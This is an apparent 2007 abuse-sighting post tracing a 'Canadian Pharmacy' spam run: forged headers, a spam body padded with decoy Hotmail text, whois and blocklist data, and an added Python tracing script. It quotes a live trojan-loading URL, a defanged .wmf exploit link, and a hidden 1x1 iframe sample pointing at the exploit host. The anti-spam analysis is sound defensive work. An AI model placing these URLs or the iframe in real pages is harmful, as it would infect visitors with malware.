
[email] [drugs - Canadian Pharmacy - trojans] [83.167.101.205] (bojomedia.com / onlinemedcamp.com / 81.95.149.235 / todayisp.com) October 73% OFF


TomezNet

Oct 5, 2007, 7:30:34 PM
Received From:
IP 83.167.101.205
(at comcor-tv.ru / comcor.ru)

Spamvert URL:
http://www.bojomedia.com/7714.html

Redirected to:
http://onlinemedcamp.com/

www.bojomedia.com IP 69.89.31.109
(at bluehost.com / integratelecom.com)

iframe load (infecting browsers with trojans!)
http://81.95.149.235:8081/cgi-bin/n15/in.cgi?p=2

IP 81.95.149.235
(ROK7465 - SBL43489) (at RIPE / rbnnetwork.com / Russian Business Network)

onlinemedcamp.com IP 89.248.99.107
(SBL59228 - ROK4932) (at interdominios.com)

Title: Canadian Pharmacy

WEB:
© Copyright Canadian Pharmacy, 2003-2007. All Rights Reserved.

Many more Canadian Pharmacy sightings:
http://groups.google.com/groups/search?q=%22Canadian+Pharmacy%22+group%3A*abuse&start=0&scoring=d&

See the sender identity and header forgery by the spammer.

Plenty of forged certificates and logos, as always.

Much more info below:
====================

X-SID-PRA: VIAGRA ® Official Site <[MUNGED]>
X-Message-Info: 6sSXyD95QpWE/
Gol6Xgyk4GJeJi241AC501DMBAdPfMAU5qC2g958D5aGeYeQQXnJaMkcFlQLIHTo5pjtevTYA==
Received: from tomts21-srv.bellnexxia.net ([209.226.175.183]) by bay0-
pamc1-f1.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.2444);
Wed, 3 Oct 2007 14:21:15 -0700
Received: from [MUNGED]
by toip19.srvr.bell.ca with ESMTP; 03 Oct 2007 17:21:06 -0400
Received: (qmail 18206 invoked by uid 110); 3 Oct 2007 17:09:38 -0400
Delivered-To: [MUNGED]
Received: (qmail 18185 invoked from network); 3 Oct 2007 17:09:38
-0400
Received: from unknown (HELO zrb) (83.167.101.205)
by [MUNGED] with SMTP; 3 Oct 2007 17:09:38 -0400
Received: from Rocco Staton (10.13.11.19) by zrb (PowerMTA(TM) v3.2r4)
id hfp12o31d91j24 for <[MUNGED]>; Thu, 4 Oct 2007 01:09:19 +0300
Message-Id: <20071004040919.47015.qmail@zrb>
To: <[MUNGED]>
Subject: October 73% OFF
From: VIAGRA ® Official Site <[MUNGED]>
Return-Path: [MUNGED]
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Date: Wed, 3 Oct 2007 17:21:15 -0400
X-OriginalArrivalTime: 03 Oct 2007 21:21:15.0990 (UTC)
FILETIME=[54F26760:01C80603]

<style>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://
www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir="ltr">
<head>
<meta http-equiv=Content-Type content="text/html;
charset=unicode">
<meta name=Generator content="Microsoft SafeHTML">
<title>WL 90-day Email 1a</title>
<table width=550 border=0 cellpadding=0 cellspacing=0
bgcolor="#999999">
<tr>
<td align=center valign=middle>
<table width=548 border=0 cellpadding=0 cellspacing=0
bgcolor="#FFFFFF">
<tr valign=top bgcolor="#999999">
<td><img src="http://ads1.ezo.com/ads/pronws/CIQ3536/spacer.gif" alt="

" width=14 height=1 border=0></td>
<td><img src="http://ads1.mfs.com/ads/pronws/CIQ3536/spacer.gif" alt="

" width=122 height=1 border=0></td>
<td><img src="http://ads1.mdo.com/ads/pronws/CIQ3536/spacer.gif" alt="

" width=279 height=1 border=0></td>
<td><img src="http://ads1.ext.com/ads/pronws/CIQ3536/spacer.gif" alt="

" width=119 height=1 border=0></td>
<td><img src="http://ads1.sxo.com/ads/pronws/CIQ3536/spacer.gif" alt="

" width=14 height=1 border=0></td>
</tr>
<tr valign=top>
<td colspan=5><img src="http://ads1.ufy.com/ads/pronws/
CIQ3536/1a_banner.jpg" alt="Windows

Live Hotmail" width=548 height=224 border=0></td>
</tr>
<tr valign=top>
<td> </td>
<td> </td>
<td colspan=2> </td>
<td> </td>
</tr>
<tr valign=top>
<td> </td>
<td><img src="http://ads1.pss.com/ads/pronws/CIQ3536/1a_hotmail.jpg"
alt="Hotmail Inbox" width=122 height=130 border=0></td>
<td colspan=2><font face="Verdana, Arial, Helvetica, sans-serif"
style="font-size:14px;font-weight:bold;color:#0099ff">Changes you'll
appreciate as a loyal Hotmail user</font>
<font face="Verdana, Arial, Helvetica, sans-serif" style="font-size:
11px">
<br>
Let's hear it for a clean, customizable design! The results? Less
clutter on the page and the ability to choose your own color theme.
Whether you prefer blue, black, red, or green - now you can make
it suit your mood. Plus, check out the improved navigation for
quicker
access to your folders and mail and use search mail to easily find
that
message you sent last month!
<br>
<a href="http://cimail15.kae.com/Key=5289.DgYJ.C.C.Hlqzpy"
style="color:#0099ff" target="_blank"> Find out what else has
changed</a></font></td>
<td> </td>
</tr>
<tr valign=top>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr valign=top>
<td> </td>
<td colspan=2><font face="Verdana, Arial, Helvetica, sans-serif"
style="font-size:14px;font-weight:bold;color:#0099ff">Manage your
spam</font> <font face="Verdana, Arial, Helvetica, sans-serif"
style="font-size:11px"> <br>
Thanks to color codes (yellow and red) on incoming messages, you'll be
alerted to suspicious e-mail. Now you decide what to mark as "safe"
and
"unsafe" for improved spam protection on your incoming mail. When you
do so, "unsafe" mail is automatically reported to help improve the
spam
protection on the Hotmail servers. Good news: this can help you
receive
less spam over time!<br>
<br>
<a href="http://cimail15.pln.com/Key=5289.DgYJ.D.C.HzpRwb"
style="color:#0099ff" target="_blank">Manage your spam-here's
how</a></font></td>
<td><img src="http://ads1.vvm.com/ads/pronws/CIQ3536/1a_spam.jpg"
alt=Spam width=119 height=83 border=0></td>
<td> </td>
</tr>
</style>
<p><font color="#FF0000"><a href="http://www.bojomedia.com/
7714.html"><b><font size="+4">Click to buy Official VIAG®A for as low
as $1.79 <b></a></font></p>
<style>
<tr valign=top>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr valign=top>
<td> </td>
<td><img src="http://ads1.nxn.com/ads/pronws/CIQ3536/1a_inbox.jpg"
alt=Inbox width=122 height=104 border=0></td>
<td colspan=2><font face="Verdana, Arial, Helvetica, sans-serif"
style="font-size:14px;font-weight:bold;color:#0099ff">It's your
inbox, so choose <em>your</em> view</font> <font face="Verdana,
Arial,

Helvetica, sans-serif" style="font-size:11px"> <br>
You choose the way you want to see and use your e-mail:
<br>
<br>
Choose classic version if you want a fast, simple way to read and
manage your e-mail. It's perfect if you have a slower connection or
prefer the traditional inbox view of just your e-mail listed.
<br>
<br>
Use full version if you're on a broadband connection to get access to
more features like address auto-complete, reading pane, and
drag-and-drop. If you're a Microsoft® Office Outlook® user,
you'll feel right at home.<br>
<br>
<a href="http://cimail15.usl.com/Key=5289.DgYJ.F.C.HqpJkn"
style="color:#0099ff" target="_blank">Learn more about classic and
full
version</a></font></td>
<td> </td>
</tr>
<tr valign=top>
<td> </td>
<td colspan=3>
<hr style="height:1px">
</td>
<td> </td>
</tr>

<tr valign=top>
<td> </td>
<td colspan=3><font face="Verdana, Arial, Helvetica, sans-serif"
style="font-size:11px">Microsoft respects your privacy. To learn more,
please read our online <a href="http://cimail15.tpt.com/
Key=5289.DgYJ.G.C.Htf6gp" style="color:#0099ff"
target="_blank">Privacy Statement</a>. <br>
<br>
Microsoft Corporation, One Microsoft Way, Redmond, WA 98052</font></
td>
<td> </td>
</tr>
<tr valign=top>
<td colspan=5> </td>
</tr>
</table>
</td>
</tr>
<tr>
<td align=center valign=middle><img src="http://ads1.hrx.com/ads/
pronws/CIQ3536/spacer.gif" alt=" " width=122 height=1 border=0></td>
</tr>
</table>
</div>
</div>
</div>
</body>
</html>
</style>

-- END OF SPAM --

Recent spammer sightings:
http://groups.google.com/groups/search?q=%22September+70%25%22+group%3A*abuse&start=0&scoring=d&

SEE the sender identity and header forgery by the spammer spoofing our
domain.

WEB:
Licensed by The College of Pharmacists of British Columbia.
If you have any questions or concerns you can contact the college at
200-1765 West 8th Ave. Vancouver, BC, Canada V6J 5C6
You may contact us at +1(210) 787-1711, please, keep your order I.D.
every time you make a call.
© Copyright Canadian Pharmacy, 2003-2007. All Rights Reserved.

See also Viagra.com Inc sightings:
http://groups.google.com/groups/search?q=%22Viagra.com+Inc%22+group%3A*abuse&start=0&scoring=d&

See:
IP 83.167.101.205

http://moensted.dk/spam/?addr=83.167.101.205
http://spamcop.net/w3m?action=checkblock&ip=83.167.101.205
Spam source - http://wpbl.info/record?ip=83.167.101.205

More comcor-tv.ru sightings:
http://groups.google.com/groups/search?q=comcor-tv.ru+group%3A*abuse&start=0&scoring=d&

inetnum: 83.167.101.0 - 83.167.101.255
netname: COMCOR-TV_CLIENTS_C14_2
descr: public for subscibers COMCOR-TV CMTS01
country: RU
role: NOC CCTV
address: Russia, 117036, Moscow
address: Dm. Ulianova st., 7A
phone: +7 (495) 132 79 03
fax-no: +7 (495) 737 51 94

route: 83.167.96.0/19
descr: COMCOR-TV Network
origin: AS15582
notify: regi...@comcor-tv.ru
notify: tat...@comcor-tv.ru
mnt-by: COMTV-MNT
changed: gle...@rambler-co.ru
AS Name: COMCORTV-AS COMCOR-TV Autonomous System
http://www.cidr-report.org/cgi-bin/as-report?as=15582

6 SBL listings for IPs under the responsibility of comcor.ru
http://www.spamhaus.org/sbl/listings.lasso?isp=comcor.ru

Spamvert URL:
http://www.bojomedia.com/7714.html

See source code:

HTTP/1.1 200 OK
Date: Thu, 04 Oct 2007 17:11:07 GMT
Server: Apache/1.3.37 (Unix) mod_fastcgi/2.4.2 mod_auth_passthrough/
1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2
mod_ssl/2.8.28 OpenSSL/0.9.7a PHP-CGI/0.1b
Last-Modified: Mon, 03 Oct 2007 12:57:34 GMT
ETag: "1150c36-45-4700eebe"
Accept-Ranges: bytes
Content-Length: 69
Connection: close
Content-Type: text/html

<META http-equiv="refresh" content="0; url=http://onlinemedcamp.com">

Redirected to:
http://onlinemedcamp.com/

See:
www.bojomedia.com IP 69.89.31.109
ns1.bluehost.com 74.220.195.31
ns2.bluehost.com 69.89.16.4
MX bojomedia.com 69.89.31.109

http://moensted.dk/spam/?addr=69.89.31.109

69.89.31.109 = box309.bluehost.com

OrgName: Bluehost Inc.
OrgID: BLUEH-2
NetRange: 69.89.16.0 - 69.89.31.255
CIDR: 69.89.16.0/20
NetName: BLUEHOST-NETWORK-1
NetHandle: NET-69-89-16-0-1
Parent: NET-69-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.BLUEHOST.COM
NameServer: NS2.BLUEHOST.COM

route: 69.89.16.0/20
descr: Integra Telecom Route Object
origin: AS11798
remarks: Integra Telecom Customer
remarks: contacts per RFC2142:
remarks: Abuse / UCE report abuse[]integratelecom.com
AS Name: BLUEHOST-AS - Bluehost Inc.
http://www.cidr-report.org/cgi-bin/as-report?as=11798

10 SBL listings for IPs under the responsibility of integratelecom.com
http://www.spamhaus.org/sbl/listings.lasso?isp=integratelecom.com

1 SBL listings for IPs under the responsibility of bluehost.com
http://www.spamhaus.org/sbl/listings.lasso?isp=bluehost.com

Let's see whois.fastdomain.com:
Registrar Name....: BlueHost.Com
Registrar Whois...: whois.bluehost.com
Registrar Homepage: http://www.bluehost.com/

Domain Name: BOJOMEDIA.COM

Created on..............: 2007-08-10 16:10:11 GMT
Expires on..............: 2008-08-10 10:10:11 GMT
Last modified on........: 2007-09-11 16:08:06 GMT

Registrant Info: (FAST-12785240)
Attn: bojomedia.com
C/O BlueHost.Com Domain Privacy
1215 North Research Way
Suite #Q 3500
Orem, Utah 84097
United States
Phone: +1.8017659400
Fax..: +1.8017651992
Email: wh...@bluehost.com
Last modified: 2007-04-05 16:50:56 GMT

Administrative Info: (FAST-12785240)
Attn: bojomedia.com
C/O BlueHost.Com Domain Privacy
1215 North Research Way
Suite #Q 3500
Orem, Utah 84097
United States
Phone: +1.8017659400
Fax..: +1.8017651992
Email: wh...@bluehost.com
Last modified: 2007-04-05 16:50:56 GMT

Technical Info: (FAST-12785240)
Attn: bojomedia.com
C/O BlueHost.Com Domain Privacy
1215 North Research Way
Suite #Q 3500
Orem, Utah 84097
United States
Phone: +1.8017659400
Fax..: +1.8017651992
Email: wh...@bluehost.com
Last modified: 2007-04-05 16:50:56 GMT

Status: Locked

Domain servers in listed order:
NS1.BLUEHOST.COM
NS2.BLUEHOST.COM

WARNING => infecting browsers with trojans!
SEE iframe load from:
http://81.95.149.235:8081/cgi-bin/n15/in.cgi?p=2

See:
IP 81.95.149.235

http://moensted.dk/spam/?addr=81.95.149.235
http://www.spamhaus.org/query/bl?ip=81.95.149.235

http://www.spamhaus.org/sbl/sbl.lasso?query=SBL43489
81.95.144.0/20 is listed on the Spamhaus Block List (SBL)

16-Jul-2007 05:25 GMT | SR04

Russian Business Network.
rbnnetwork.com / Too coin Software: iframemoney.biz / etc.
Shame shame, infecting browsers with trojans!
h t t p : / / xgbgsfmdis.biz/ dl/ xpladv737.wmf

Main Info:
http://www.spamhaus.org/rokso/evidence.lasso?rokso_id=ROK7465

53 SBL/ROKSO listings for IPs under the responsibility of RIPE
http://www.spamhaus.org/sbl/listings.lasso?isp=RIPE

See:
onlinemedcamp.com IP 89.248.99.107
ns3.todayisp.com 218.16.121.50
ns4.todayisp.com 210.22.13.48

onlinemedcamp.com has no MX records

http://moensted.dk/spam/?addr=89.248.99.107

http://www.spamhaus.org/sbl/sbl.lasso?query=SBL59228
89.248.99.107/32 is listed on the Spamhaus Block List (SBL/ROKSO)

02-Oct-2007 04:45 GMT | SR20

Leo Kuvayev / BadCow.
Canadian Pharmacy site (onlinemedcamp.com)

Main Info:
http://www.spamhaus.org/rokso/evidence.lasso?rokso_id=ROK4932

2 SBL/ROKSO listings for IPs under the responsibility of
interdominios.com
http://www.spamhaus.org/sbl/listings.lasso?isp=interdominios.com

inetnum: 89.248.96.0 - 89.248.111.255
netname: ES-INTERDOMINIOS-COM-20060704
descr: Grupo Interdominios S.A
country: ES
organisation: ORG-GIS8-RIPE
org-name: Grupo Interdominios S.A
org-type: LIR
person: Fernando Gonzalez Barsh
address: Avd del Tormes n2 local 90
Urb Las Lomas
Boadilla del Monte
Madrid 28660
Spain
e-mail: ben...@interdominios.com

route: 89.248.99.0/24
descr: Internet Access Routes of Interdominios
descr: Grupo Interdominios S.A
origin: AS42237
mnt-by: FernandoGonz-mnt
changed: fern...@interdominios.com
AS Name: INTERDOMINIOS Grupo Interdominios S.A.
http://www.cidr-report.org/cgi-bin/as-report?as=42237

Let's see whois.todaynic.com:
Domain name: onlinemedcamp.com
Status: Active

Protection Status: public
( make contact info private at http://www.now.cn/domain/domainPrivate.php
)

Registrant:
Name: liu tao
Organization: liu tao
Address: nan chang
City: NanChang
Country: CN
Postal Code: 321000

Administrative Contact:
Name: liu tao
Organization: liu tao
Address: nan chang
City: NanChang
Country: CN
Postal Code: 321000
Phone: +86.7913219002
Fax: +86.7913219002
Email: cnc...@21cn.com

Technical Contact:
Name: liu tao
Organization: liu tao
Address: nan chang
City: NanChang
Country: CN
Postal Code: 321000

Nameserver Information:

Create: 2007-09-27 07:17:49
Update: 2007-09-27
Expired: 2008-09-27

See:
ns4.todayisp.com IP 210.22.13.48

reverse:
210.22.13.48 = sym.gdsz.cncnet.net

http://moensted.dk/spam/?addr=210.22.13.48
http://www.spamhaus.org/query/bl?ip=210.22.13.48

http://www.spamhaus.org/sbl/sbl.lasso?query=SBL59229
210.22.8.0/21 is listed on the Spamhaus Block List (SBL)

02-Oct-2007 04:53 GMT | SR04

Nothing but spam from this china-netcom.com network

13 SBL listings for IPs under the responsibility of china-netcom.com
http://www.spamhaus.org/sbl/listings.lasso?isp=china-netcom.com

inetnum: 210.22.0.0 - 210.22.35.255
netname: SHENZHEN2-CNC
country: CN
descr: shenzhen branch, china netcom corp
admin-c: YS224-AP
tech-c: YS224-AP
status: ALLOCATED NON-PORTABLE
changed: cnci...@china-netcom.com
person: yumei sun
nic-hdl: YS224-AP
e-mail: sz-ipa...@china-netcom.com
address: china netcom
address: shenzhen
phone: +86-0755-6983588
country: CN
changed: mo...@china-netcom.com

route: 210.22.0.0/19
descr: CHINA NETCOM
origin: AS9929
mnt-by: MAINT-AS9929
changed: xu...@china-netcom.com
AS Name: CNCGROUP-SZ CNCGROUP IP network of ShenZhen region MAN network
http://www.cidr-report.org/cgi-bin/as-report?as=17623

See:
ns3.todayisp.com IP 218.16.121.50

More 218.16.121.50 sightings:
http://groups.google.com/groups/search?q=218.16.121.50+group%3A*abuse&qt_s=Search

http://moensted.dk/spam/?addr=218.16.121.50
Blocked http://www.spamsources.fabel.dk/ip/218.16.121.50

inetnum: 218.13.0.0 - 218.18.255.255
netname: CHINANET-GD
descr: CHINANET Guangdong province network
descr: Data Communication Division
descr: China Telecom
country: CN

AS Name: CHINANET-BACKBONE No.31,Jin-rong Street
http://www.cidr-report.org/cgi-bin/as-report?as=4134

Let's see whois.networksolutions.com:
Registrant:
Ma, Songxin
Todaynic.com,INC.
No.211 Xihai building Renming E road
Xiangzhou district
Zhuhai, GD 519000
CN

Domain Name: TODAYISP.COM

Administrative Contact, Technical Contact:
Ma, Songxin sa...@now.net.cn
Todaynic.com,INC.
No.211 Xihai building Renming E road
Xiangzhou district
Zhuhai, GD 519000
CN
+86-756-2282685 fax: +86-756-2282526

Record expires on 09-Jun-2010.
Record created on 09-Jun-2002.
Database last updated on 5-Oct-2007 18:05:32 EDT.

Domain servers in listed order:
NS4.TODAYISP.COM 210.22.13.48
NS3.TODAYISP.COM 218.16.121.50

More todayisp.com sightings:
http://groups.google.com/groups/search?q=todayisp.com+group%3A*abuse&start=0&scoring=d&

Read more:
http://groups.google.com/group/news.admin.net-abuse.sightings/msg/ae0a8cc1a8b9e918

And:
http://groups.google.com/group/news.admin.net-abuse.sightings/msg/6cd26c793e4a5c23

And:
http://groups.google.com/group/news.admin.net-abuse.sightings/msg/304b0dc256d9e615

And:
http://groups.google.com/group/news.admin.net-abuse.sightings/msg/17cd1878f9bd53ba

And:
http://groups.google.com/group/news.admin.net-abuse.sightings/msg/1db3147bc2411d77

And:
http://groups.google.com/group/news.admin.net-abuse.sightings/msg/7f587d35d2b7fe49

And:
http://groups.google.com/group/news.admin.net-abuse.sightings/msg/64063dbbcc112c50

Cheers, Tomez


--
All postings to news.admin.net-abuse.sightings are unconfirmed and
unverified unless stated otherwise by the moderators. All opinions
expressed above are considered the opinions of the original poster,
not the moderators or their respective employers.

For a copy of the guidelines to this group, see:

http://www.killfile.org/~tskirvin/nana/
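The analysis in the sighting above is done by hand: read the Received chain
top-down until the first hop handed to a trusted relay by an outside host
(83.167.101.205), ignore the decoy Hotmail newsletter the spammer hid inside
<style> tags, pick out the one rendered link, then follow the meta-refresh on
bojomedia.com and the iframe on the landing page. The script below, added
here as an example and not part of Tomez's post or any tool he used, does the
same four steps with the standard library. The sample message is constructed
from the headers quoted in the sighting (the [MUNGED] placeholders are kept
and the body is cut down to the relevant tags); the trusted-relay list is an
assumption about the reporter's own mail path, and the landing-page markup
around the iframe URL is constructed, since the sighting gives only the URL.

```python
"""
Trace a spam message to its injection point, pull the rendered link out of a
body padded with invisible decoy HTML, and follow the redirect/iframe chain.
Added example; standard library only.
"""
import re
from email import message_from_string
from ipaddress import ip_address

# Constructed sample built from the headers quoted in the sighting. [MUNGED]
# placeholders kept; body trimmed to decoy-in-<style> plus the real link.
SAMPLE_MESSAGE = """\
Received: from tomts21-srv.bellnexxia.net ([209.226.175.183]) by bay0-pamc1-f1.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.2444); Wed, 3 Oct 2007 14:21:15 -0700
Received: from [MUNGED] by toip19.srvr.bell.ca with ESMTP; 03 Oct 2007 17:21:06 -0400
Received: (qmail 18206 invoked by uid 110); 3 Oct 2007 17:09:38 -0400
Received: (qmail 18185 invoked from network); 3 Oct 2007 17:09:38 -0400
Received: from unknown (HELO zrb) (83.167.101.205) by [MUNGED] with SMTP; 3 Oct 2007 17:09:38 -0400
Received: from Rocco Staton (10.13.11.19) by zrb (PowerMTA(TM) v3.2r4) id hfp12o31d91j24 for <[MUNGED]>; Thu, 4 Oct 2007 01:09:19 +0300
Message-Id: <20071004040919.47015.qmail@zrb>
Subject: October 73% OFF
From: VIAGRA Official Site <[MUNGED]>
Content-Type: text/html; charset="iso-8859-1"

<style>
<html><body>
<a href="http://cimail15.kae.com/Key=5289.DgYJ.C.C.Hlqzpy">Find out what else has changed</a>
</style>
<p><a href="http://www.bojomedia.com/7714.html"><b>Click to buy</b></a></p>
<style>
</body></html>
</style>
"""

# Assumption: relays on the reporter's own delivery path. A hop whose "by"
# side is outside this set is below the trust boundary, and its "from" side
# is whatever the spammer chose to write.
TRUSTED_HOSTS = ("hotmail.com", "bell.ca", "bellnexxia.net", "[MUNGED]")
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def _trusted(fragment: str) -> bool:
    return any(host in fragment for host in TRUSTED_HOSTS)


def injection_point(raw_message: str):
    """Walk Received headers newest-first. The first public 'from' address
    handed to a trusted relay by a host outside the trusted set is where the
    message entered; hops below it (10.13.11.19 via 'zrb') are unverifiable."""
    msg = message_from_string(raw_message)
    for hop in msg.get_all("Received", []):
        hop = " ".join(hop.split())           # unfold continuation lines
        if not hop.startswith("from "):
            continue                           # local qmail hand-off, no remote host
        from_part, _, by_part = hop.partition(" by ")
        if not _trusted(by_part):
            return None                        # crossed the boundary with no hit
        if _trusted(from_part):
            continue                           # one of our own relays
        for ip in IP_RE.findall(from_part):
            try:
                if ip_address(ip).is_global:   # skips RFC1918 / loopback claims
                    return ip
            except ValueError:
                continue
    return None


STYLE_BLOCK_RE = re.compile(r"<style[^>]*>.*?</style>", re.I | re.S)
HREF_RE = re.compile(r'href\s*=\s*["\']?([^"\'\s>]+)', re.I)


def spamvertised_urls(raw_message: str):
    """Links a mail client would actually render: everything inside <style>
    is invisible decoy text (here a lifted Hotmail newsletter), so drop it."""
    body = message_from_string(raw_message).get_payload()
    return HREF_RE.findall(STYLE_BLOCK_RE.sub("", body))


META_REFRESH_RE = re.compile(
    r'<meta[^>]+http-equiv\s*=\s*["\']?refresh["\']?[^>]*content\s*=\s*["\']?'
    r'\s*\d+\s*;\s*url=([^"\'>\s]+)', re.I | re.S)
IFRAME_SRC_RE = re.compile(r'<iframe[^>]+src\s*=\s*["\']?([^"\'\s>]+)', re.I | re.S)


def redirect_target(html: str):
    """Meta-refresh target when the page is only a forwarder."""
    m = META_REFRESH_RE.search(html)
    return m.group(1) if m else None


def iframe_sources(html: str):
    """Off-site iframes on the landing page; the exploit loader lives here."""
    return IFRAME_SRC_RE.findall(html)


# The forwarder body quoted in the sighting (bojomedia.com/7714.html).
FORWARDER_PAGE = '<META http-equiv="refresh" content="0; url=http://onlinemedcamp.com">'

# Constructed stand-in for the landing page: only the iframe URL is from the
# sighting, the surrounding markup is assumed.
LANDING_PAGE = """<html><body><h1>Canadian Pharmacy</h1>
<iframe src="http://81.95.149.235:8081/cgi-bin/n15/in.cgi?p=2" width="1" height="1" frameborder="0"></iframe>
</body></html>"""

if __name__ == "__main__":
    print("injected from:", injection_point(SAMPLE_MESSAGE))
    print("spamvert URL :", spamvertised_urls(SAMPLE_MESSAGE))
    print("redirects to :", redirect_target(FORWARDER_PAGE))
    print("iframe loads :", iframe_sources(LANDING_PAGE))
```

The trust-boundary rule is the whole point of the Received walk: the hop
"from Rocco Staton (10.13.11.19) by zrb" below the injection point was
written by the spammer's PowerMTA and proves nothing, which is why the
function stops at the first hit instead of reporting every address it sees.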
